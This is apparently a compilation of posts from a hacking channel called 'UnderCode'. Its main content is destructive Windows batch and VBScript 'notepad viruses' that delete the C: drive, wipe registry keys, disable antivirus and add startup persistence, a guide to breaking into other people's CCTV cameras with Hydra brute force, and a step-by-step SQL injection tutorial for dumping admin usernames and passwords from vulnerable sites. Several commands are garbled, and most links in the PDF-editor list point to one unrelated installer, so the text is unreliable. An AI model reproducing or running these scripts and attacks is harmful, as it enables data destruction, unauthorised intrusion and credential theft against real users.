- - - - - -undercOde- - - - -

🦑🆆🅷🅰️🆃 🅸🆂 🆆🅴🅱️🆂🅷🅴🅻🅻 🅿️🅷🅿️ 🆅🅸🆁🆄🆂 & 🅷🅾️🆆 🆃🅾️ 🆄🆂🅴 🅱️🆈 🆄🅽🅳🅴🆁🅲🅾️🅳🅴 ?
(t.me/UnderCodeTestingOfficial)

🦑 Let s start with Small Definition:
(Anyone called Hacker should he know this)

1) A web shell can be written in any language supported by the target web server.

2) The most usually observed web shells are written in widely supported languages, such as PHP and ASP. Perl, Python, Ruby, and Unix shell scripts are also used.

3) A web–shell itself cannot attack or exploit a remote vulnerability, so it is always the second step of an attack.

🦑🅷🅾️🆆 🆆🅴🅱️ 🆂🅷🅴🅻🅻 🅴🆇🅿️🅻🅾️🅸🆃🆂 🅰️🆁🅴 🆄🆂🅴🅳 🅱️🆈 🅰️🆃🆃🅰️🅲🅺🅴🆁🆂?

1) Web shells are frequently used in trade offs because of the combination of remote access and features. Even simple web hulls can have a huge impact and often maintain a minimal presence.

2)To Gain Persistent Remote Access To Control Server

3)To Execute Privilege Escalation:

Unless a server is misconfigured, the web shell will run under the Web server’s user permissions, which are (or at least should be) limited. Using a web shell, an attacker can attempt to perform elevation of privilege attacks by exploiting local system vulnerabilities

4)To Setup Zombie Botnet For DDOS attacks

🦑🅲🅾️🅼🅼🅾️🅽 🆃🅰️🅲🆃🅸🅲🆂 🆄🆂🅴🅳 🆃🅾️ 🅴🆇🅴🅲🆄🆃🅴 🆆🅴🅱️ 🆂🅷🅴🅻🅻 🅿️🅷🅿️ 🅴🆇🅿️🅻🅾️🅸🆃

Web shells can be delivered through a number of Web application exploits or configuration weaknesses, including:

1)SQL injection;

2)Intersite script;

3) WordPress vulnerabilities in applications/services;

4) WordPress file processing vulnerabilities (for example, download filtering or assigned permissions);

5) WordPress vulnerabilities included files (RFI) and local files included (LFI);

6) Exposed administration interfaces (possible areas to find the vulnerabilities mentioned above).

@͓̽ ͓̽M͓̽r͓̽z͓̽ ͓̽B͓̽o͓̽t͓̽N͓̽e͓̽t͓̽
——UNDERCODE------

Windows 7 😁

- - - - - - ยภ๔єгς๏๔є- - - - - -

🦑 Set window on top, make it dark, transparent and more auto customize (For all Windows Version):
Paid theme For Free In UnderCode:
(follow us Twitter.com/UnderCodeTC)

🦑🄻🄴🅃 🅂 🅂🅃🄰🅁🅃:

1) Download https://github.com/gileli121/WindowTop-Web-Installer/releases/tag/05-31-19

2)The installer will also download for you offline installer.

3) You can use the software in 2 ways:

*Download Autoit and run the WindowTop.au3 file as it is

*Download compiled exe file of the software

🦑🅃🄴🅂🅃🄴🄳 🄱🅈 🅄🄽🄳🄴🅁🄲🄾🄳🄴 🄾🄽:

1)Windows 10

2)Windows 7


🦑Trouble in Install
>https://youtu.be/En9JtAn8nRY

ENJOY 😊


@̶̫̱̍͊͜ ̸̛͠ ̝̹̞̻̩̲M̶̛̪̰̻͎̼̆̄̈́͘̕ṙ̵͚̦̘̦͇͇̣͔̓ͅͅ.̶̍̎ ̩̟̜̟͓͛͐͂͜ ̴̨̙͓̦̫̲̯́̀̉͑̓͛̈̚͠͝ͅB̵̅ ̹o̵̞͇̠̠̜͒́̓̏͒̽̽́͛͝t̷ ̛̲̲͑͗̀n̶̛̐͌̒ ̝͓͎̰̻̦e̴̠͑̆̈́̅͛̈́̐t̴̎̓́ ̠̬͖̮͈͈͇͌ͅ(̵̨̠͉͈̹̞͖͒̈́̽̈́t̴ ̹͒̽̈́̽̒̀̒̕͝.̸̨͓̭̈́̍͒m̶̒ ̢͖͇͚̑.̷̪̩̬̣̬̑̏͋̎

- - - - - - ยภ๔єгς๏๔є- - - - -

- - - - - - -U҉N҉D҉E҉R҉C҉O҉D҉E҉ - - - - - -

🦑░H░o░w░ ░C░r░e░a░t░e░ ░D░a░n░g░e░r░o░u░s░ ░V░i░r░u░s░ ░b░y░ ░u░n░d░e░r░c░O░d░e░:
(Facebook.com/UnderCodeTestingCompanie)

🦑For this tutorial to create simple Notepad Virus you don’t need to be a die-hard programmer or something like that, but a basic knowledge of flow charts and loops helps you a lot to understand what’s going on here. So let’s start to create a trojan virus using notepad to run via command prompt(cmd) in Windows 10, 8/8.1, 7 or XP.

🦑𝐥𝐞𝐭 𝐬 𝐒𝐭𝐚𝐫𝐭:

1)Now, Open the Notepad application and Copy (Ctrl+C) and Paste (Ctrl+V) the codes given Written below one by one for the different virus in a different file.

>Code :
@Echo off
Del C: \ *.* || y

>Copy (Ctrl+C) and Paste (Ctrl+V) the source code)

2) I am not responsible for any damage or error reporting on Your PC, do it at your own risk.

3)𝘾𝙤𝙙𝙚𝙨:

A) Disable Internet Permanently

>This code will disable the internet connectivity permanently.

echo @echo off>c:windowswimn32.bat
echo break off>c:windowswimn32.bat echo
ipconfig/release_all>c:windowswimn32.bat
echo end>c:windowswimn32.batreg add
hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add
hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho You Have Been HACKED!
PAUSE

B) Delete Key Registry Files

This will delete key registry files, then loops a message

This is dangerous and unrecoverable Notepad Virus.

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your PC has been crashed.Your Dad.
GOTO MESSAGE

C) Endless Notepads

T>his will pop up endless notepads until the computer freezes and crashes

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Popping CD Drives

This will make the CD drives constantly pop out

Set oWMP = CreateObject(”WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop

D) ░E░n░d░l░e░s░s░ ░E░n░t░e░r░ ░U░n░d░e░r░C░o░d░e░

This will make the enter button pressed continuously

Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop

E) Application Bomber

It will start to open different applications repeatedly which will affect the system’s performance.

You can also add the application of your choice in the above code.

@echo off
:x
start winword
start mspaint
start notepad
start write
start cmd
start explorer
start control
start calc
goto x

F)Folder Flooder

This will create unlimited no. of folders.

@echo off
:x
md %random%
/folder.
goto x

G)User Account Flooder

This will create large no. of the user account on one’s PC and goes on

@echo off
:xnet
user %random% /add
goto x

H) Process Creator

This will create unlimited background processes

%0|%0

10.Windows Hacker

This will delete your whole C:\ drive and it really unrecoverable

@Echo off
Del C:\ *.* |y

10+. Anti Virus Disabler

This large code will disable any antivirus installed on the system

@ echo off
rem
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmincls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.datcls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda
software\*.*
rem

@̸͇̱̘͆͑́̎͑̆͘͘ͅ ̶̡̤̲̰̲̗̜̈́M̸͇̪̜̃̂̄r̵̋͗̀̎ ̟͖̫̙̪͖̥̦̀̌́̈́͜ͅ.̸̧̛̱̘̝̌͋͗̄̅́̾̌ ̷ ̧̦̫̯̻̻̮̜̈̽͆̋B̴̭͕̲̲̲̎̏̈̍͂͘ͅ o̷͓͓̣̤͆ͅt̷̛̜̹̰̜̦̠͑̓̓͒͠ ̼̲̹N̵̢̩̰̠͊͂̈́̽͜ȩ̶͍̲͙͊̈́͌͑̈́̎̆̕̚t̶͂̋̀̓͠ ͓́͋ ̶̨͙̞̩̞̖̽̌́̾̐̕(̵̩͎͈̹͚͇̘͙͘ẗ̴̟͇́̀͊̐̚ ̼̥̮.̸̘̗͎͊͜͝m̷͆ ̪͔̜̹͊͛̈̾͠.̶̯̥͚̩͐͂̈́̔̀̈́̒)̷̹͕̣̙͙̲̭̍̑̏̈́̒

- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -

FULL GUIDE PROGRAMMING NOT NOT NESSASARY CREATE DANGEROUS VIRUS NOTPAD☠️

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑˜”*°•.˜”*°• Android-Exploits Tested •°*”˜.•°*”˜
U P D A T E D :
(twitter.com/UnderCodeTC)

🦑░I░n░s░t░a░l░l░i░s░a░t░i░o░n░ ░&░ ░R░u░n░:░

1) git clone https://github.com/sundaysec/Android-Exploits.git

2) Recommend you grab exploitpack latest version

>wget https://github.com/juansacco/exploitpack/archive/master.zip

3) Extract then Navigate into the folder and type:

4) java -jar ExploitPack.jar

5) Load the exploits

🦑 OWASP Top 10 Mobile Risks On Rooted Android Should Carring:


1_Insecure Data Storage
2_Weak Server Side Controls
3_Insufficient Transport Layer Protection
4_Client Side Injection
5-Poor Authorization and Authentication
6_Improper Session Handling
7_Security Decisions Via Untrusted Inputs
8_Side Channel Data Leakage
9-Broken Cryptography
10-Sensitive Information Disclosure

ŴᖇＩᵗᵗєｎ ᵇЎ 𝓂Ř. 𝔟ᵒŦ𝐧ᵉт (𝓣.Ⓜ️.)
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Hack Any CctV Camera by undercOde:
(t.me/UnderCodeTestingofficiaL)

🦑𝕴𝖓𝖘𝖙𝖆𝖑𝖑𝖎𝖘𝖆𝖙𝖎𝖔𝖓 𝖆𝖓𝖉 𝕽𝖚𝖓:

1) All You need is going inside same network
(example same netprovider or same wifi or wlan network simply go inside same wifi or wlan connected to Camera)

2) Get any Ip Scanner to locate and get the Cam ip
both simple tools work to parrot ubanto or kali and avaible for major os platform and both avaible on github

3)Choose Ip Address Range
Before sanning with arp-scan or angry ip
Choose ip range so go to browser and type what is my ip

4) it s show your public ip
Example here my ip is 213.204.114.62 in Lebanon

So i choose ip range 213.204.114.1
and 213.204.114.200

🦑5) Now :
Go to tools > Preferences > Ports | add ports 80,8080,23 in Port selection tab
It will scan 80,8080 and 23 port.


6) Any ip detection tool (webdetect) will help avaible per default on wireshark or can allow in settings of angryip scanner to show the camera ip

>CCTV camera model name, camera name

7) Now start scan

8) After choosing ip if you lucky for major camera you get default login of any Camera TheN DONE
if not:
Open Hydra The famous bryte force tool :
Type
hydra -s 80 -l admin -P /root/ THEN DIR LOCATION -e ns -t targetIP http*
(LOGIN SITE NAME )

9) Now hydra done we have password login

again open cam login and put name & Pass

>ENJOY THIS ONE ON ANY PRIVATE OR PUBLIC CAMERA
🦑Any doubt Check This videohttps://youtu.be/FaNOVUoHQ0w

ŴᖇＩᵗᵗєｎ ᵇЎ 𝓂Ř. 𝔟ᵒŦ𝐧ᵉт (𝓣.Ⓜ️.)
▁ ▂ ▄ ▅ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▅ ▄ ▂ ▁

- - - - - - ⓊⓃⒹⒺⓇⒸⓄⒹⒺ- - - - - -

🦑BUILD GAMES APK EASY WITH TERMUX:
RECENTLY WE SHARE MANY TOOLS FOR BUILD APK ON TERMUX IN undercOde BY THIS NEW REPO SPECIAL FOR GAME APK BUILD USING TERMUX :
(t.me/UnderCodeTestingofficial)

🦑🄸🄽🅂🅃🄰🄻🄻 & 🅁🅄🄽:

1) cd && git clone https://github.com/sdrausty/buildAPKs

2) cd buildAPKs

3) git submodule init

4) git submodule update sources/games

5) ENJOY

@̷̏͗ ̧̣̩̜̮͔̺̻̙̱̃̄ ̶̜̲̰̪̒M̷̔̓̎̀ ̡̱͕͔̠͈̲͓͙̐r̸̬̠̱͉̱̟̃̆̅͛̾͘͝.̸̉̄̓͛̚ ̡̖̱̣͍̪͙̖̋̈́̑͗ͅ ̸̨̬̱͚͂́̍B̵̀̈́͂̓̽́̈́͗̆̍ ̗ǫ̵̰̜͕͈̼̠̩̞̖́̅̑͗̆̇̕t̷̡̥̰̫͐̓̇͗̋͒͗N̶͕̩̟͐̉͋̔̋̽͌̈́̏e̴͙͇͚̫̘͚͉̤̒́̋̋͐͋̀ ͔t̴͖͉̺͔̟̙͖̉́͘ͅ

- - - - - -ⓊⓃⒹⒺⓇⒸⓄⒹⒺ- - - - - -

- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -
🦑HACK WIFI ,WEBSITES ,INFORMATION GETHERING, SNIFFING, SPOOFING ,,,MORE...
ALL ON TERMUX:
(intagram.com/UnderCodetestingCompany)

🦑I̾n̾s̾t̾a̾l̾l̾a̾t̾i̾o̾n̾ ̾i̾n̾ ̾L̾i̾n̾u̾x̾ ̾

1) Must Run As ROOT For major tools:

2)git clone https://github.com/thehackingsage/hacktronian.git

3)cd hacktronian

4)chmod +x install.sh

5)./install.sh

6)That's it.. you can execute tool by typing hacktronian

🦑

Open Termux

pkg install git

pkg install python

git clone https://github.com/thehackingsage/hacktronian.git

cd hacktronian

chmod +x hacktronian.py

python2 hacktronian.py
Video Tutorial :

YouTube : https://www.youtube.com/watch?v=1LJlyQAQby4

@̷̏͗ ̧̣̩̜̮͔̺̻̙̱̃̄ ̶̜̲̰̪̒M̷̔̓̎̀ ̡̱͕͔̠͈̲͓͙̐r̸̬̠̱͉̱̟̃̆̅͛̾͘͝.̸̉̄̓͛̚ ̡̖̱̣͍̪͙̖̋̈́̑͗ͅ ̸̨̬̱͚͂́̍B̵̀̈́͂̓̽́̈́͗̆̍ ̗ǫ̵̰̜͕͈̼̠̩̞̖́̅̑͗̆̇̕t̷̡̥̰̫͐̓̇͗̋͒͗N̶͕̩̟͐̉͋̔̋̽͌̈́̏e̴͙͇͚̫̘͚͉̤̒́̋̋͐͋̀ ͔t̴͖͉̺͔̟̙͖̉́͘ͅ

- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -

T.me/UNDERcodeTestingOfficial
SUPPORT & SHARE

- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -

🦑 𝖇𝖊𝖘𝖙 𝖕𝖉𝖋 𝖊𝖉𝖎𝖙𝖔𝖗 𝖆𝖕𝖕𝖘 𝖋𝖔𝖗 𝖜𝖎𝖓𝖉𝖔𝖜𝖘, 𝖒𝖆𝖈 & 𝖑𝖎𝖓𝖚𝖝 &
(instagram.com/UnderCodetestingCompany)

🦑
1) Sejda (Web, Windows, Mac, Linux) to edit text and create PDF forms for free

>https://www.sejda.com/pdf-editor

2) Xodo (Web, Android, iOS, Windows) to annotate and collaborate on PDFs anywhere

>http://download.wondershare.net/pdfelement-pro_full5261.exe

3) CloudConvert (Web) to turn PDF files into editable Word documents

>https://zapier.com/blog/best-pdf-editor-apps/


4) Foxit (Web, Android, iOS, Windows, Mac) to edit PDFs everywhere

>http://download.wondershare.net/pdfelement-pro_full5261.exe


5) Preview (Mac) to rearrange pages, sign documents, and mark up PDFs for free

> https://support.apple.com/en-us/HT201740?utm_source=zapier.com&utm_medium=referral&utm_campaign=zapier

6) PDF Expert (iOS, Mac) to quickly edit PDF text and images

>http://download.wondershare.net/pdfelement-pro_full5261.exe

7) PDFelement (Android, iOS,Windows, Mac) to edit PDFs and add forms in an Office-like editor

>http://download.wondershare.net/pdfelement-pro_full5261.exe

8) Adobe Acrobat (Windows, Mac) to create detailed PDFs and forms

>http://download.wondershare.net/pdfelement-pro_full5261.exe

ŴᖇＩᵗᵗєｎ ᵇЎ 𝓂Ř. 𝔟ᵒŦ𝐧ᵉт (𝓣.Ⓜ️.)

▁ ▂ ▄ ▅ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▅ ▄ ▂ ▁[

- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -

🦑ℍ𝕒𝕔𝕜 𝕨𝕖𝕓𝕤𝕚𝕥𝕖 𝕕𝕒𝕥𝕒𝕓𝕒𝕤𝕖 𝕘𝕦𝕚𝕕𝕖 𝕓𝕪 𝕌𝕟𝕕𝕖𝕣ℂ𝕠𝕕𝕖:


🦑Website Database Like:

* DB servers,
* MySQL(Open source),
* MSSQL,
* MS-ACCESS,
* Oracle,
* Postgre SQL(open source),
* SQLite,

🦑🄻🄴🅃 🅂 🅂🅃🄰🅁🅃:


1) Finding vulnerable websites:
Can get alot google search or get many from deepweb & Google combine

> github.com/UnderCodeTestingC/Vulnerables-Sites

2) Examples sites: (sql)

inurl:index.php?id=

inurl:trainers.php?id=

inurl:buy.php?category=

inurl:article.php?ID=

inurl:play_old.php?id=

inurl:declaration_more.php?decl_id=

inurl:pageid=

inurl:games.php?id=

inurl:page.php?file=

inurl:newsDetail.php?id=

inurl:gallery.php?id=

3)Checking for Vulnerability on the website

EXAMPLE:

> h**p://www.site.com/products.php?id=7


🦑To test this URL, we add a quote to it ‘

> h**p://www.site.com/products.php?id=7’


4) On executing it, if we get an error like this: “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…”Or something like that,

> that means the target website is vulnerable to sql injection and you can hack it.

5) Find the number of columns

To find number of columns we use statement ORDER BY (tells database how to order the result) so how to use it? Well just incrementing the number until we get an error.

> h**p://www.site.com/products.php?id=5 order by 1/* –> no error

> h**p://www.site.com/products.php?id=5 order by 2/* –> no error

> h**p://www.site.com/products.php?id=5 order by 3/* –> no error

> h**p://www.site.com/products.php?id=5 order by 4/* –> Error (we get message like this Unknown column ‘4’ in ‘order clause’ or something like that)

that means that the it has 3 columns, cause we got an error on.

7) Check for UNION function

With union we can select more data in one sql statement.

So in same example site:

> h**p://www.site.com/products.php?id=5 union all select 1,2,3/*

(we already found that number of columns are 3 in section 2). )

>!if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works

8) Check MySQL version


h**p://www.site.com/products.php?id=5 union all select 1,2,3/*

NOTE: if /* not working or you get some error, then try —
it’s a comment and it’s important for our query to work properly.

Let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.

it should look like this

h**p://www.site.com/products.php?id=5 union all select 1,@@version,3/*

If you get an error “union + illegal mix of collations (IMPLICIT + COERCIBLE) …”

I didn’t see any paper covering this problem, so i must write it .
What we need is convert() function
i.e.
h**p://www.site.com/products.php?id=5 union all select 1,convert(@@version using latin1),3/*

or with hex() and unhex()

i.e.

h**p://www.site.com/products.php?id=5 union all select 1,unhex(hex(@@version)),3/*

and you will get MySQL version .


9) Getting table and column name

Well if the MySQL version is less than 5 (i.e 4.1.33, 4.1.12…) <— later i will describe for MySQL greater than 5 version.
we must guess table and column name in most cases.

common table names are: user/s, admin/s, member/s …

10) common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc…
i.e would be

h**p://www.site.com/products.php?id=5 union all select 1,2,3 from admin/*

(we see number 2 on the screen like before, and that’s good )

table admin exists…

11) Now to check column names.

h**p://www.site.com/products.php?id=5 union all select 1,username,3 from admin/*

(if you get an error, then try the other column name)
we get username displayed on screen, example would be admin, or superadmin etc…

12) now to check if column password exists

h**p://www.site.com/products.php?id=5 union all select 1,password,3 from admin/*

(if you get an error, then try the other column name)
we seen password on the screen in hash or plain-text, it depends of how the database is set up
i.e md5 hash, mysql hash, sha1…
Now we must complete query to look nice
For that we can use concat() function (it joins strings)
i.e

h**p://www.site.com/products.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*


>t.me/UnderCodeTestingOfficial

Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)

(there is another way for that, char(58), ascii value for : )

h**p://www.site.com/products.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*

13) Now we get displayed username:password on screen, i.e admin:admin or admin:somehash
When you have this, you can login like admin or some superuser.
If can’t guess the right table name, you can always try mysql.user (default)
It has user password columns, so example would be

h**p://www.site.com/products.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*


14) To get tables we use table_name and information_schema.tables.

i.e

h**p://www.site.com/products.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

15) Here we replace the our number 2 with table_name to get the first table from information_schema.tables
displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.
i.e

h**p://www.site.com/products.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*


16) note that i put 0,1 (get 1 result starting from the 0th)
now to view the second table, we change limit 0,1 to limit 1,1

i.e

🦑
h**p://www.site.com/products.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

the second table is displayed.

for third table we put limit 2,1

i.e

h**p://www.site.com/products.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

17) Keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc…

To get the column names the method is the same.

Here we use column_name and information_schema.columns


18 ) Check the net whether this hash is cracked before:
Download:
http://www.md5decrypter.co.uk


19) Crack the password with the help of a site:
Download::

http://www.milw0rm.com/cracker/insert.php
or
http://passcracking.com/index.php

> DONT COPY OUR TuTorial 🌚

𝓦𝓻𝓲𝓽𝓽𝓮𝓷 𝓫𝔂 𝓜𝓻. 𝓑𝓸𝓽𝓝𝓮𝓽 (𝓽.𝓶.)

- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -